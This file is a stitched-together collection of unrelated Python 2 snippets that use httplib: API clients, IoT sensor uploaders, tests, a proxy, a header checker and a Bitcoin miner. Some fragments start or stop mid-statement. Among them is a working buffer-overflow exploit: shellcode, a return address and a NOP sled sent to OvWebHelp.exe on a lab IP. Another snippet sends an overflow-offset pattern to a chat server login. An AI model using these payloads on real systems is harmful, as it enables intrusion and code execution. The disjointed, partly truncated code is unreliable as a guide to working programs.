def do_compile(self, params, target_filename, filenames, remove): # Send the request to Google. headers = {"Content-type": "application/x-www-form-urlencoded"} conn = httplib.HTTPConnection("closure-compiler.appspot.com") conn.request("POST", "/compile", urllib.urlencode(params), headers) response = conn.getresponse() json_str = response.read() conn.close() # Parse the JSON response. json_data = json.loads(json_str) def file_lookup(name): if not name.startswith("Input_"): return "???" n = int(name[6:]) - 1 return filenames[n] if json_data.has_key("serverErrors"): errors = json_data["serverErrors"] for error in errors: print("SERVER ERROR: %s" % target_filename) print(error["error"]) elif json_data.has_key("errors"): errors = json_data["errors"] for error in errors: print("FATAL ERROR") print(error["error"]) if error["file"]: print("%s at line %d:" % (file_lookup(error["file"]), error["lineno"])) print(error["line"]) print((" " * error["charno"]) + "^") sys.exit(1) else: if json_data.has_key("warnings"): warnings = json_data["warnings"] for warning in warnings: print("WARNING") print(warning["warning"]) if warning["file"]: print( "%s at line %d:" % (file_lookup(warning["file"]), warning["lineno"])) print(warning["line"]) print((" " * warning["charno"]) + "^") print() if not json_data.has_key("compiledCode"): print("FATAL ERROR: Compiler did not return compiledCode.") sys.exit(1) code = HEADER + "\n" + json_data["compiledCode"] code = code.replace(remove, "") # Trim down Google's Apache licences. # The Closure Compiler used to preserve these until August 2015. # Delete this in a few months if the licences don't return. LICENSE = re.compile("""/\\* [\w ]+ (Copyright \\d+ Google Inc.) https://developers.google.com/blockly/ Licensed under the Apache License, Version 2.0 \(the "License"\); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. \\*/""") code = re.sub(LICENSE, r"\n// \1 Apache License 2.0", code) stats = json_data["statistics"] original_b = stats["originalSize"] compressed_b = stats["compressedSize"] if original_b > 0 and compressed_b > 0: f = open(target_filename, "w") f.write(code) f.close() original_kb = int(original_b / 1024 + 0.5) compressed_kb = int(compressed_b / 1024 + 0.5) ratio = int( float(compressed_b) / float(original_b) * 100 + 0.5) print("SUCCESS: " + target_filename) print("Size changed from %d KB to %d KB (%d%%)." % (original_kb, compressed_kb, ratio)) else: print("UNKNOWN ERROR")
def _prepare_connection(self, url, headers): proxy_auth = _get_proxy_auth() if url.protocol == 'https': # destination is https proxy = os.environ.get('https_proxy') if proxy: # Set any proxy auth headers if proxy_auth: proxy_auth = 'Proxy-authorization: %s' % proxy_auth # Construct the proxy connect command. port = url.port if not port: port = '443' proxy_connect = 'CONNECT %s:%s HTTP/1.0\r\n' % (url.host, port) # Set the user agent to send to the proxy if headers and 'User-Agent' in headers: user_agent = 'User-Agent: %s\r\n' % (headers['User-Agent']) else: user_agent = '' proxy_pieces = '%s%s%s\r\n' % (proxy_connect, proxy_auth, user_agent) # Find the proxy host and port. proxy_url = atom.url.parse_url(proxy) if not proxy_url.port: proxy_url.port = '80' # Connect to the proxy server, very simple recv and error checking p_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) p_sock.connect((proxy_url.host, int(proxy_url.port))) p_sock.sendall(proxy_pieces) response = '' # Wait for the full response. while response.find("\r\n\r\n") == -1: response += p_sock.recv(8192) p_status = response.split()[1] if p_status != str(200): raise ProxyError('Error status=%s' % str(p_status)) # Trivial setup for ssl socket. ssl = socket.ssl(p_sock, None, None) fake_sock = httplib.FakeSocket(p_sock, ssl) # Initalize httplib and replace with the proxy socket. connection = httplib.HTTPConnection(proxy_url.host) connection.sock = fake_sock return connection else: # The request was HTTPS, but there was no https_proxy set. return HttpClient._prepare_connection(self, url, headers) else: proxy = os.environ.get('http_proxy') if proxy: # Find the proxy host and port. proxy_url = atom.url.parse_url(proxy) if not proxy_url.port: proxy_url.port = '80' if proxy_auth: headers['Proxy-Authorization'] = proxy_auth.strip() return httplib.HTTPConnection(proxy_url.host, int(proxy_url.port)) else: # The request was HTTP, but there was no http_proxy set. return HttpClient._prepare_connection(self, url, headers)
import httplib, json import time headers = {"charset": "utf-8", "Content-Type": "application/json"} conn = httplib.HTTPConnection("localhost") s, ms = divmod(int(time.time() * 1000.), 1000) sample = { "r_id": 123, "p_time": '{}.{:03d}'.format(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(s)), ms), "pos_x": 640.0, "pos_y": 380.0, "dir_x": 1.0, "dir_y": 0.0 } sampleJson = json.dumps(sample, ensure_ascii='False') # Send the JSON data as-is -- we don't need to URL Encode this conn.request("POST", "/IoRT/api/pos_w.php", sampleJson, headers) response = conn.getresponse() print(response.read())
def login(): """ Attempt to log in. Returns AlreadyLoggedIn if we're already logged in, InvalidCredentials if the username and password given are incorrect, and Successful if we have managed to log in. Throws an exception if an error occurs somewhere along the process. """ logger = logging.getLogger("FirewallLogger") # Find out where to auth try: conn = httplib.HTTPConnection("74.125.236.51:80") conn.request("GET", "/") response = conn.getresponse() # 303 leads to the auth page, so it means we're not logged in if (response.status != 303): return (LoginState.AlreadyLoggedIn, response.status) authlocation = response.getheader("Location") finally: conn.close() logger.info("The auth location is: %s" % authlocation) # Make a connection to the auth location parsedauthloc = urlparse.urlparse(authlocation) try: authconn = httplib.HTTPSConnection(parsedauthloc.netloc) authconn.request("GET", parsedauthloc.path + "?" + parsedauthloc.query) authResponse = authconn.getresponse() data = authResponse.read() finally: authconn.close() # Look for the right magic value in the data match = re.search(r"VALUE=\"([0-9a-f]+)\"", data) magicString = match.group(1) logger.debug("The magic string is: " + magicString) # Now construct a POST request params = urllib.urlencode({'username': username, 'password': password, 'magic': magicString, '4Tredir': '/'}) headers = {"Content-Type": "application/x-www-form-urlencoded", "Accept": "text/plain"} try: postconn = httplib.HTTPSConnection(parsedauthloc.netloc) postconn.request("POST", "/", params, headers) # Get the response postResponse = postconn.getresponse() postData = postResponse.read() finally: postconn.close() # Look for the keepalive URL keepaliveMatch = re.search(r"location.href=\"(.+?)\"", postData) if keepaliveMatch is None: # Whoops, unsuccessful -- probably the username and password didn't match logger.fatal("Authentication unsuccessful, check your username and password.") return (LoginState.InvalidCredentials, None) keepaliveURL = keepaliveMatch.group(1) logger.info("The keep alive URL is: " + keepaliveURL) logger.debug(postData) return (LoginState.Successful, urlparse.urlparse(keepaliveURL))
# sending "GET" request over proxy using httplib in python import httplib conn = httplib.HTTPConnection("10.1.1.19", 80) conn.request("GET", "http://www.python.org/index.html", headers={...}))
def panFetch(song, path): global _high isad = int(_settings.getSetting('isad')) * 1024 wait = int(_settings.getSetting('delay')) qual = _settings.getSetting('quality') skip = _settings.getSetting('skip') url = urlparse.urlsplit(song.audioUrl[qual]) conn = httplib.HTTPConnection(url.netloc, timeout=9) conn.request('GET', "%s?%s" % (url.path, url.query)) strm = conn.getresponse() size = int(strm.getheader('content-length')) if size in (341980, 173310): # empty song cause requesting to fast xbmc.log( "%s.Fetch MT (%13s,%8d) '%s - %s - %s'" % (_plugin, _stamp, size, song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG) panMsg(song, 'To Many Songs Requested') return xbmc.log("%s.Fetch %s (%13s,%8d) '%s - %s - %s'" % (_plugin, strm.reason, _stamp, size, song.songId[:4], song.artist, song.title)) totl = 0 qued = False last = time.time() file = open(path, 'wb', 0) while (totl < size) and (not xbmc.abortRequested): try: data = strm.read(min(4096, size - totl)) except socket.timeout: xbmc.log( "%s.Fetch TO (%13s,%8d) '%s - %s - %s'" % (_plugin, _stamp, totl, song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG) break if _high < (time.time() - last): _high = time.time() - last last = time.time() file.write(data) totl += len(data) if (not qued) and (size > isad): threading.Timer(wait, panQueue, (song, path)).start() qued = True file.close() conn.close() if totl < size: # incomplete file xbmc.log( "%s.Fetch RM (%13s) '%s - %s - %s'" % (_plugin, _stamp, song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG) xbmcvfs.delete(path) elif size <= isad: # looks like an ad if skip == 'true': xbmc.log( "%s.Fetch AD (%13s) '%s - %s - %s'" % (_plugin, _stamp, song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG) xbmcvfs.delete(path) elif qued == False: # play it anyway song.artist = song.album = song.title = 'Advertisement' dest = path + '.ad.m4a' xbmcvfs.rename(path, dest) panQueue(song, dest) else: panSave(song, path)
sense.show_message("P: %d" % convert_pressure, text_colour=color, scroll_speed=0.08) sense.show_message("H: %d" % humidity, text_colour=color, scroll_speed=0.08) #sense.show_message("CPU Load %s" % cpu_pc, text_colour=color, scroll_speed=0.08) #sense.show_message("CPU Temp %sC" % cpu_temp, text_colour=color, scroll_speed=0.08) #sense.show_message("Free Ram %s" % mem_avail_mb, text_colour=color, scroll_speed=0.08) time.sleep(1) headers = { "Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain" } conn = httplib.HTTPConnection("api.thingspeak.com:80") params = urllib.urlencode({ 'field1': convert_pressure, 'field2': temp3, 'field3': humidity, 'field4': cpu_pc, 'field5': cpu_temp, 'field6': mem_avail_mb, 'key': 'AAAAAAAAAAAAAAAA' }) try: conn.request("POST", "/update", params, headers) response = conn.getresponse() #print strftime("%a, %d %b %Y %H:%M:%S", localtime()) #print response.status, response.reason data = response.read()
def check_headers(self, url, follow_redirects=0): retval = { 'x-frame-options': { 'defined': False, 'warn': 1, 'contents': '' }, 'strict-transport-security': { 'defined': False, 'warn': 1, 'contents': '' }, 'access-control-allow-origin': { 'defined': False, 'warn': 0, 'contents': '' }, 'content-security-policy': { 'defined': False, 'warn': 1, 'contents': '' }, 'x-xss-protection': { 'defined': False, 'warn': 1, 'contents': '' }, 'x-content-type-options': { 'defined': False, 'warn': 1, 'contents': '' }, 'x-powered-by': { 'defined': False, 'warn': 0, 'contents': '' }, 'server': { 'defined': False, 'warn': 0, 'contents': '' } } parsed = urlparse(url) protocol = parsed[0] hostname = parsed[1] path = parsed[2] if (protocol == 'http'): conn = httplib.HTTPConnection(hostname) elif (protocol == 'https'): conn = httplib.HTTPSConnection( hostname, context=ssl._create_unverified_context()) else: return {} try: conn.request('HEAD', path) res = conn.getresponse() headers = res.getheaders() except socket.gaierror: print '[*] Fallo la Solicitud HTTP ' return False if (res.status >= 300 and res.status < 400 and follow_redirects > 0): for header in headers: if (header[0] == 'location'): return self.check_headers(header[1], follow_redirects - 1) for header in headers: if (header[0] in retval): retval[header[0]] = self.evaluate_warn(header[0], header[1]) return retval
import httplib conn = httplib.HTTPConnection("shorturl.baiku.cn") conn.request("GET", "/?url=http://www.baidu.com/") r1 = conn.getresponse() print r1.status, r1.reason data1 = r1.read() print data1 conn.close()
def measure_send(): """Sending values to ThingSpeak.""" global previousTemperature global previousHumidity # get CPU temperature tempCPU = int(open('/sys/class/thermal/thermal_zone0/temp').read()) / 1e3 if all_args.d: print("[THINKGSPEAK] CPU temperature:", tempCPU) # get load averages loadAll = open('/proc/loadavg').read() load1 = loadAll[0:4] load5 = loadAll[5:9] load15 = loadAll[10:14] if all_args.d: print("[THINKGSPEAK] Average-1:", load1, "Average-5:", load5, "Average-15:", load15) try: # get room temperature & humidity humRoom, tempRoom = Adafruit_DHT.read_retry(Adafruit_DHT.DHT11, DHTpin) if all_args.d: print("[THINKGSPEAK] FIRST measuremet T:", tempRoom, "H:", humRoom) print("[THINKGSPEAK] previousTemperature:", previousTemperature, "previousHumidity:", previousHumidity) if previousHumidity == 100 or previousTemperature == 100: if all_args.d: print("[THINKGSPEAK] initialising 'previous' values") previousHumidity = humRoom previousTemperature = tempRoom humidityRoom, temperatureRoom = validateDHT(humRoom, tempRoom) if all_args.d: print("[THINKGSPEAK] >>>> VALIDATED measurement T:", temperatureRoom, "H:", humidityRoom) # Parameters WITH DHT11 if sys.version_info[0] < 3: # Python 2.7 params = urllib.urlencode({ 'field1': temperatureRoom, 'field2': humidityRoom, 'field3': tempCPU, 'field4': load1, 'field5': load5, 'field6': load15, 'key': key }) else: # Python 3 params = urllib.parse.urlencode({ 'field1': temperatureRoom, 'field2': humidityRoom, 'field3': tempCPU, 'field4': load1, 'field5': load5, 'field6': load15, 'key': key }) except: print("[THINKGSPEAK] Failed to read DHT11 !") # Parameters WITHOUT DHT11 if sys.version_info[0] < 3: # Python 2.7 params = urllib.urlencode({ 'field3': tempCPU, 'field4': load1, 'field5': load5, 'field6': load15, 'key': key }) else: # Python 3 params = urllib.parse.urlencode({ 'field3': tempCPU, 'field4': load1, 'field5': load5, 'field6': load15, 'key': key }) headers = { "Content-typZZe": "application/x-www-form-urlencoded", "Accept": "text/plain" } if sys.version_info[0] < 3: conn = httplib.HTTPConnection("api.thingspeak.com:80") else: conn = http.client.HTTPConnection("api.thingspeak.com:80") try: conn.request("POST", "/update", params, headers) response = conn.getresponse() if all_args.d: print("[THINKGSPEAK] connection to Thingspeak:", response.status, response.reason) # data = response.read() conn.close() except: if all_args.d: print("[THINKGSPEAK] connection to Thingspeak failed !")
def serverJsonPost(self, json): """Sends a JSON POST command to the MRDS server (used for defining speeds)""" mrds = httplib.HTTPConnection(self.server) mrds.request('POST','/lokarria/differentialdrive',json,HEADERS) return mrds.getresponse()
to_drop = set(''';/?:@&=+$,<>#%"{}|\\^[]`\n\r''') def str_to_key(s): return ''.join(c if c != ' ' else '_' for c in s.lower() if c not in to_drop) def solr_post(h1, body): if not connect: return 'not connected' h1.request('POST', update_url, body, { 'Content-type': 'text/xml;charset=utf-8'}) response = h1.getresponse() response.read() return response.reason h1 = None if connect: h1 = httplib.HTTPConnection(solr_host) h1.connect() print solr_post(h1, '<delete><query>*:*</query></delete>') print solr_post(h1, '<commit/>') print solr_post(h1, '<optimize/>') def add_field(doc, name, value): field = Element("field", name=name) field.text = unicode(strip_bad_char(value)) doc.append(field) def add_field_list(doc, name, field_list): for value in field_list: add_field(doc, name, value) re_bad_char = re.compile('[\x01\x19-\x1e]')
def __init__(self, base_url): self.httpClient = httplib.HTTPConnection(base_url, 80, timeout=30)
# coding=utf8 import httplib cookie = 'u="2|1:0|10:1506671668|1:u|32:NTljZGZhZDU1MTE1OWEyODRlZWViYzQw|b73bf9a0c49bc6e2213a58b12dec2e0d94fc0d42f1ff9f30dfa51335e2a00a77"' base = 'localhost' # base = 'n01.me-yun.com' path = '/1.0/thirdpush/push' body = '{"userid":"59dc6266ca714327af2e4e85","action":"assignedBought","otherid":"59f1a6beca71434dd657f822"}' try: header = {'X-MeCloud-Debug': 1} # 'Cookie': cookie, print header httpClient = httplib.HTTPConnection(base, 8000, timeout=30) httpClient.request("POST", path, body, header) response = httpClient.getresponse() print response.status print response.reason print response.read() # print response.msg # print response.getheaders() except Exception, e: print e finally: if httpClient: httpClient.close()
"\x46\x36\x43\x66\x46\x33\x43\x66\x51\x78\x44\x39\x48\x4c\x47" "\x4f\x4c\x46\x4b\x4f\x4b\x65\x4e\x69\x4d\x30\x42\x6e\x50\x56" "\x43\x76\x49\x6f\x46\x50\x43\x58\x44\x48\x4d\x57\x47\x6d\x51" "\x70\x49\x6f\x4a\x75\x4d\x6b\x4c\x30\x4c\x75\x4f\x52\x43\x66" "\x42\x48\x4d\x76\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x48\x55\x47" "\x4c\x47\x76\x43\x4c\x45\x5a\x4b\x30\x4b\x4b\x4d\x30\x44\x35" "\x43\x35\x4f\x4b\x51\x57\x42\x33\x51\x62\x50\x6f\x43\x5a\x45" "\x50\x42\x73\x49\x6f\x4a\x75\x46\x6a\x41\x41") data = "A" * 57 data2 = "B" * 5000 ret = "\xDF\xf2\xe5\x77" + "\x90" * 254 + sc # call esp kernel32.dll payload = data + ret p = urllib.urlencode({'Topic': payload, 'Target': data2}) h = { "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html", "User-Agent": "BackTrack", "Accept-Language": "en" } c = httplib.HTTPConnection('172.16.29.130') c.request("POST", "/OvCgi/OvWebHelp.exe", p, h) r = c.getresponse() print r.status, r.reason c.close() print "\nDone\n"
import httplib import urllib2 #http get request with headers host = #http server headers = {"Content-Type":"text/html","Accept-Encoding":"text/plain","User-Agent":"Mozilla/5.0 (x11; Ubuntu; Linux x86_64) like Gecko"} conn = httplib.HTTPConnection(host) conn.request("GET"," "," ", headers) #add content/body and parameters here
def test_create_table(self, mock_create_table): mock_create_table.return_value = models.TableMeta( models.TableSchema(attribute_type_map={ "ForumName": models.AttributeType('S'), "Subject": models.AttributeType('S'), "LastPostDateTime": models.AttributeType('S') }, key_attributes=["ForumName", "Subject"], index_def_map={ "LastPostIndex": models.IndexDefinition( "ForumName", "LastPostDateTime") }), models.TableMeta.TABLE_STATUS_ACTIVE) conn = httplib.HTTPConnection('localhost:8080') body = """ { "attribute_definitions": [ { "attribute_name": "ForumName", "attribute_type": "S" }, { "attribute_name": "Subject", "attribute_type": "S" }, { "attribute_name": "LastPostDateTime", "attribute_type": "S" } ], "table_name": "Thread", "key_schema": [ { "attribute_name": "ForumName", "key_type": "HASH" }, { "attribute_name": "Subject", "key_type": "RANGE" } ], "local_secondary_indexes": [ { "index_name": "LastPostIndex", "key_schema": [ { "attribute_name": "ForumName", "key_type": "HASH" }, { "attribute_name": "LastPostDateTime", "key_type": "RANGE" } ], "projection": { "projection_type": "KEYS_ONLY" } } ] } """ expected_response = { 'table_description': { 'attribute_definitions': [{ 'attribute_name': 'Subject', 'attribute_type': 'S' }, { 'attribute_name': 'LastPostDateTime', 'attribute_type': 'S' }, { 'attribute_name': 'ForumName', 'attribute_type': 'S' }], 'creation_date_time': 0, 'item_count': 0, 'key_schema': [{ 'attribute_name': 'ForumName', 'key_type': 'HASH' }, { 'attribute_name': 'Subject', 'key_type': 'RANGE' }], 'local_secondary_indexes': [{ 'index_name': 'LastPostIndex', 'index_size_bytes': 0, 'item_count': 0, 'key_schema': [{ 'attribute_name': 'ForumName', 'key_type': 'HASH' }, { 'attribute_name': 'LastPostDateTime', 'key_type': 'RANGE' }], 'projection': { 'projection_type': 'ALL' } }], 'table_name': 'Thread', 'table_size_bytes': 0, 'table_status': 'ACTIVE', 'links': [{ 'href': self.table_url, 'rel': 'self' }, { 'href': self.table_url, 'rel': 'bookmark' }] } } conn.request("POST", self.url, headers=self.headers, body=body) response = conn.getresponse() self.assertTrue(mock_create_table.called) json_response = response.read() response_payload = json.loads(json_response) self.assertEqual(expected_response, response_payload)
def callm(method, param_dict, POST=False, socket_timeout=None, data=None): """ Call the api! Param_dict is a *regular* *python* *dictionary* so if you want to have multi-valued params put them in a list. ** note, if we require 2.6, we can get rid of this timeout munging. """ try: param_dict['api_key'] = config.ECHO_NEST_API_KEY param_list = [] if not socket_timeout: socket_timeout = config.CALL_TIMEOUT for key,val in param_dict.iteritems(): if isinstance(val, list): param_list.extend( [(key,subval) for subval in val] ) elif val is not None: if isinstance(val, unicode): val = val.encode('utf-8') param_list.append( (key,val) ) params = urllib.urlencode(param_list) orig_timeout = socket.getdefaulttimeout() socket.setdefaulttimeout(socket_timeout) if(POST): if (not method == 'track/upload') or ((method == 'track/upload') and 'url' in param_dict): """ this is a normal POST call """ url = 'http://%s/%s/%s/%s' % (config.API_HOST, config.API_SELECTOR, config.API_VERSION, method) if data is None: data = '' data = urllib.urlencode(data) data = "&".join([data, params]) f = opener.open(url, data=data) else: """ upload with a local file is special, as the body of the request is the content of the file, and the other parameters stay on the URL """ url = '/%s/%s/%s?%s' % (config.API_SELECTOR, config.API_VERSION, method, params) if ':' in config.API_HOST: host, port = config.API_HOST.split(':') else: host = config.API_HOST port = 80 if config.TRACE_API_CALLS: logger.info("%s/%s" % (host+':'+str(port), url,)) conn = httplib.HTTPConnection(host, port = port) conn.request('POST', url, body = data, headers = dict([('Content-Type', 'application/octet-stream')]+headers)) f = conn.getresponse() else: """ just a normal GET call """ url = 'http://%s/%s/%s/%s?%s' % (config.API_HOST, config.API_SELECTOR, config.API_VERSION, method, params) f = opener.open(url) socket.setdefaulttimeout(orig_timeout) # try/except response_dict = get_successful_response(f) return response_dict except IOError, e: if hasattr(e, 'reason'): raise EchoNestIOError(error=e.reason) elif hasattr(e, 'code'): raise EchoNestIOError(code=e.code) else: raise
def run(self): result = True error = '' start_time = time.time() conn = httplib.HTTPConnection(self.host, self.port) num = 0 while result and ((time.time() - start_time) < self.duration): buflen = 0 try: exp_start = time.time() conn.request("GET", self.uri, None, {'X-Stress': '%d-%d' % (self.identifier, num)}) num += 1 resp = conn.getresponse() if int(resp.status) != 200: error = '(Status = %d)' % (resp.status) result = False else: givenlength = resp.getheader('content-length') mimetype = resp.getheader('content-type') if not givenlength: error = '(No content-length given)' result = False elif not givenlength.isdigit(): error = '(Invalid content-length)' result = False else: givenlength = int(givenlength) buflen = 0 while True: buf = resp.read(65000) if len(buf) > 0: buflen += len(buf) else: error = "(Expected %d bytes got %d bytes)" % ( givenlength, buflen) result = False break if buflen >= givenlength: break except: error = sys.exc_info()[1] result = False elapsedtime = time.time() - exp_start if buflen == 0 or elapsedtime == 0: throughput = 0.00 else: throughput = (8 * buflen / elapsedtime) if throughput > 1000000: throughput = throughput / 1000000 units = "Mbps" else: throughput = throughput / 1000 units = "Kbps" print " Thread %d finished download %d in %5.2f sec, throughput = %6.2f (%s)" % ( self.identifier, num - 1, elapsedtime, throughput, units), if result: print "[OK]" else: print "[FAILED]", error sys.stdout.flush()
import platform import subprocess import netaddr import httplib import ctypes import ctypes.util from pyroute2 import NetlinkError from pyroute2 import IPRoute from nose.plugins.skip import SkipTest from nose.tools import make_decorator from distutils.version import LooseVersion dtcd_uuid = str(uuid.uuid4()) # check the dtcd try: cx = httplib.HTTPConnection('localhost:7623') cx.request('GET', '/v1/network/') cx.getresponse() has_dtcd = True except: has_dtcd = False supernet = { 'ipv4': netaddr.IPNetwork('172.16.0.0/16'), 'ipv6': netaddr.IPNetwork('fdb3:84e5:4ff4::/48') } network_pool = { 'ipv4': list(supernet['ipv4'].subnet(24)), 'ipv6': list(supernet['ipv6'].subnet(64)) } allocations = {}
def __init__(self, name, prefix, url="uv-cdat.llnl.gov"): self.repo_url = url self.repo_name = name self.repo_prefix = prefix self.H = httplib.HTTPConnection(self.repo_url)
def getProxy(): try: pr = httplib.HTTPConnection(options.proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({'http': options.proxy}) except(socket.timeout):
def do_GET(self): if self.path == 'http://proxy2.test/': self.send_cacert() return req = self content_length = int(req.headers.get('Content-Length', 0)) req_body = self.rfile.read(content_length) if content_length else None if req.path[0] == '/': if isinstance(self.connection, ssl.SSLSocket): req.path = "https://%s%s" % (req.headers['Host'], req.path) else: req.path = "http://%s%s" % (req.headers['Host'], req.path) req_body_modified = self.request_handler(req, req_body) if req_body_modified is False: self.send_error(403) return elif req_body_modified is not None: req_body = req_body_modified req.headers['Content-length'] = str(len(req_body)) u = urlparse.urlsplit(req.path) scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path) assert scheme in ('http', 'https') if netloc: req.headers['Host'] = netloc setattr(req, 'headers', self.filter_headers(req.headers)) try: origin = (scheme, netloc) if not origin in self.tls.conns: if scheme == 'https': self.tls.conns[origin] = httplib.HTTPSConnection( netloc, timeout=self.timeout) else: self.tls.conns[origin] = httplib.HTTPConnection( netloc, timeout=self.timeout) conn = self.tls.conns[origin] conn.request(self.command, path, req_body, dict(req.headers)) res = conn.getresponse() version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'} setattr(res, 'headers', res.msg) setattr(res, 'response_version', version_table[res.version]) # support streaming if not 'Content-Length' in res.headers and 'no-store' in res.headers.get( 'Cache-Control'): self.response_handler(req, req_body, res, '') setattr(res, 'headers', self.filter_headers(res.headers)) self.relay_streaming(res) with self.lock: self.save_handler(req, req_body, res, '') return res_body = res.read() except Exception as e: if origin in self.tls.conns: del self.tls.conns[origin] self.send_error(502) return content_encoding = res.headers.get('Content-Encoding', 'identity') res_body_plain = self.decode_content_body(res_body, content_encoding) res_body_modified = self.response_handler(req, req_body, res, res_body_plain) if res_body_modified is False: self.send_error(403) return elif res_body_modified is not None: res_body_plain = res_body_modified res_body = self.encode_content_body(res_body_plain, content_encoding) res.headers['Content-Length'] = str(len(res_body)) setattr(res, 'headers', self.filter_headers(res.headers)) self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason)) for line in res.headers.headers: self.wfile.write(line) self.end_headers() self.wfile.write(res_body) self.wfile.flush() with self.lock: self.save_handler(req, req_body, res, res_body_plain)
def clearListenerResults(): conn = httplib.HTTPConnection("localhost:8081") conn.request("GET", "/clear_requests") response = conn.getresponse() conn.close()
#Verify that the customer is an authorized user ################################### try: w = open(RegCodeFile, 'rb') except IOError: #print "Don't find register code file in localhost" sys.exit(103) else: data = w.read() w.close() ##################################### try: w = open(EDPubKeyFile, 'rb') except: connection = httplib.HTTPConnection(vhostname + ":" + vport) connection.request('GET', '/software/verify/ed/' + serialnum) respmsg = connection.getresponse() if respmsg.status == 200: result = respmsg.read() f = open(EDPubKeyFile, 'w') f.write(result) f.close() else: sys.exit(104) else: w.close() ####################################### try: publickey = RSA.load_pub_key(EDPubKeyFile) decrypthardinfo = publickey.public_decrypt(data, RSA.pkcs1_padding)
import string, sys import socket, httplib buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" url = "/chat.ghp?username="******"&password="******"&room=1&sex=2" print "Running...\r\n" print url conn = httplib.HTTPConnection("172.16.73.129",80) conn.request("GET", url) r1 = conn.getresponse() print r1.status, r1.reason conn.close()
def connect(scheme, netloc): if scheme == 'http': return httplib.HTTPConnection(netloc) if scheme == 'https': return httplib.HTTPSConnection(netloc) raise UnsupportedSchemeError()
def __init__(self, server_url): self._server_url = server_url port = int(server_url.split(':')[2].split('/')[0]) self._http_client = httplib.HTTPConnection('127.0.0.1', port, timeout=30)
def __init__(self, host, port, username, password): authpair = "%s:%s" % (username, password) self.authhdr = "Basic %s" % (base64.b64encode(authpair)) self.conn = httplib.HTTPConnection(host, port, False, 30)
def getwork(self): while True: job = None for s in self.servers: if s.disabled > 0: s.disabled = s.disabled - 1 continue try: self.requests = self.requests + 1 conn = httplib.HTTPConnection(s.host, s.port, True, self.getworktimeout) req = json.dumps({ "method": "getwork", "params": [], "id": 0 }) headers = { "User-Agent": "PyFPGAMiner " + miner.version, "Content-type": "application/json", "Content-Length": len(req), "Authorization": self.auth } conn.request("POST", s.path, req, headers) response = conn.getresponse() if not self.longpolling: headers = response.getheaders() for h in headers: if h[0] == "x-long-polling": url = h[1] try: if url[0] == "/": url = "http://" + s.host + ":" + str( s.port) + url if url[:7] != "http://": raise Exception() parts = url[7:].split("/", 2) path = "/" + parts[1] parts = parts[0].split(":") if len(parts) != 2: raise Exception() host = parts[0] port = parts[1] self.miner.log( "Found long polling URL for %s: %s\n" % (self.name, url), self.miner.green) self.longpolling = True self.longpollingthread = threading.Thread( None, self.longpollingworker, self.name + "_longpolling", (host, port, path)) self.longpollingthread.daemon = True self.longpollingthread.start() except: self.miner.log( "Invalid long polling URL for %s: %s\n" % (self.name, url)) break response = json.loads(response.read()) state = binascii.unhexlify(response["result"]["midstate"]) data = binascii.unhexlify(response["result"]["data"]) job = Job(self, state, data) break except Exception as e: self.miner.log( "Error while requesting job from %s (%s:%d): %s\n" % (self.name, s.host, s.port, e)) s.disabled = 10 self.failedreqs = self.failedreqs + 1 if job != None: if self.longpollhit: self.longpollkilled = self.longpollkilled + 1 else: self.queue.put(job) self.longpollhit = False else: time.sleep(1)